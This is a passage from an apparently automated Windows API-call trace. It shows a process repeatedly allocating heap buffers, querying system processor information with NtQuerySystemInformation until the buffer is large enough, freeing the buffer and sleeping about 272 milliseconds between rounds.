Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0159.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0159.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0159.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0159.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0159.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0159.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0159.830] Sleep (dwMilliseconds=0x110) [0160.149] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0160.150] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0160.150] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.150] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0160.151] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0160.151] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.151] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0160.152] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0160.152] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.152] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0160.152] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0160.153] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0160.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.154] Sleep (dwMilliseconds=0x110) [0160.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0160.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0160.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0160.434] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0160.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0160.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0160.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0160.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0160.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0160.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.438] Sleep (dwMilliseconds=0x110) [0160.871] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0160.871] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0160.872] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0160.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0160.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0160.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0160.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0160.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0160.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0160.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0160.877] Sleep (dwMilliseconds=0x110) [0161.164] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0161.164] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0161.167] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.167] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0161.168] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0161.169] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0161.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0161.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0161.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0161.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0161.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.173] Sleep (dwMilliseconds=0x110) [0161.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0161.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0161.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0161.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0161.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0161.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0161.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0161.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0161.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0161.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.612] Sleep (dwMilliseconds=0x110) [0161.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0161.913] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0161.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.914] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0161.914] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0161.915] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.915] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0161.916] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0161.916] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.917] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0161.917] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0161.918] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.918] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0161.919] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0161.919] Sleep (dwMilliseconds=0x110) [0162.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0162.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0162.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0162.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0162.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0162.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0162.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0162.255] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0162.256] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0162.256] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0162.256] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0162.257] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0162.257] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0162.258] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0162.258] Sleep (dwMilliseconds=0x110) [0162.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0162.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0162.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0162.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0162.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0162.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0162.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0162.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0162.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0162.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0162.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0162.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0162.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0162.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0162.676] Sleep (dwMilliseconds=0x110) [0163.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0163.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0163.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0163.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0163.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0163.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0163.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0163.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0163.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0163.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.005] Sleep (dwMilliseconds=0x110) [0163.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0163.381] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0163.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.382] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0163.383] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0163.399] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.399] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0163.399] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0163.400] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.400] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0163.400] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0163.401] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.401] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0163.402] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.402] Sleep (dwMilliseconds=0x110) [0163.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0163.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0163.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0163.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0163.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0163.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0163.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0163.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0163.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0163.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0163.770] Sleep (dwMilliseconds=0x110) [0164.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0164.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0164.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0164.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0164.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0164.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0164.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0164.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0164.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0164.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.084] Sleep (dwMilliseconds=0x110) [0164.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0164.423] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0164.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0164.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0164.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0164.426] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0164.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0164.427] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0164.427] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.428] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0164.429] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.430] Sleep (dwMilliseconds=0x110) [0164.836] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0164.836] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0164.837] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0164.837] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0164.837] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0164.838] HeapFree (in: hHeap=0x2560000, 